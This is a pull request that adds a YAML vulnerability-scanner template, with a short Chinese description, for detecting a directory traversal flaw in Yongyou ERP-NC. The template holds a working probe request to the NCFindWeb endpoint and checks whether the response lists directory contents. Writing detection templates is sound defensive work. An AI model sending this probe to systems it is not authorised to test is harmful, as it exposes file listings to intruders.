### PR TITLE
yongyou-erp-nc-directory-traversal

### DIFF
--- a/yongyou-erp-nc-directory-traversal.yml
+++ b/yongyou-erp-nc-directory-traversal.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-yongyou-erp-nc-directory-traversal
+rules:
+  - method: GET
+    path: /NCFindWeb?service=IPreAlertConfigService&filename=
+    expression: |
+      response.status == 200 && response.body.bcontains(b"WEB-INF") && response.body.bcontains(b"Tree.js")
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/master/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BERP-NC%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md


### PR DESCRIPTION


## 本 poc 是检测什么漏洞的
用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息
## 测试环境
app="用友-UFIDA-NC"
## 备注
![image](https://user-images.githubusercontent.com/74232513/114699624-209df000-9d53-11eb-9d29-1f9fef5417ca.png)
